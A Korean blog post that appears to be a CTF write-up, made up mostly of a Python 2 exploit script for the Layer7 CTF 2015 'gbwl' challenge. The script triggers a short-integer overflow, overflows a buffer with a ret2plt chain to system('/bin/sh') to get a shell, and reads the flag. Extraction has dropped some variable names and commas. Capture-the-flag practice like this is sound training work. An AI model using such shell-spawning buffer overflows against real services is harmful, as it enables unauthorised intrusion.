티스토리 뷰

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
from socket import *
from telnetlib import *
from struct import pack
 
SERVER = ("prob.layer7.kr"61616)
= socket(AF_INET, SOCK_STREAM)
s.connect(SERVER)
= Telnet()
t.sock = s
 
print t.read_until("Password : ")
s.send("0z57cr40a2abc34103295de63bb2b36e\n"# send password
 
print t.read_until("people : ")
s.send(str(0xFFFF + 1+ "\n")  # Short Type integer overflow
                                # unsigned __int16
p  = "A" * 320
+= pack("<I"0x08048570# system@plt
+= pack("<I"0x44444444# Dummy
+= pack("<I"0x0804A050# "/bin/sh" ; string
 
s.send(p + "\n")
print s.recv(1024)
print s.recv(1024)
 
s.send("cat /home/gbwl/flag\n")
print s.recv(1024)
print s.recv(1024)
cs


딱 봐도 Int Overflow문제다 하고 풀려고 했는데 타입이 short이거 못보고 계속 삽질했음

어차피 같은학교라 상도 못받으니 포너블쪽만 다 풀어보려고 했음. own-web은 brop같아서 나중에 풀어보려고함



gbwl-new


'Pwnable > CTF' 카테고리의 다른 글

Layer7 CTF 2015 Spil..Spli....SPPPPPIILL  (0) 2015.09.16
Codegate 2015 Bookstore  (0) 2015.09.14
CampCTF 2015 hacker_level exponly  (1) 2015.08.25
Inc0gnito 2015 anti-hexray exponly  (0) 2015.08.25
0CTF 2015 [FlagGenerator]  (2) 2015.04.16
댓글
공지사항
최근에 올라온 글
최근에 달린 댓글
Total
Today
Yesterday
링크
TAG
more
«   2024/05   »
1 2 3 4
5 6 7 8 9 10 11
12 13 14 15 16 17 18
19 20 21 22 23 24 25
26 27 28 29 30 31
글 보관함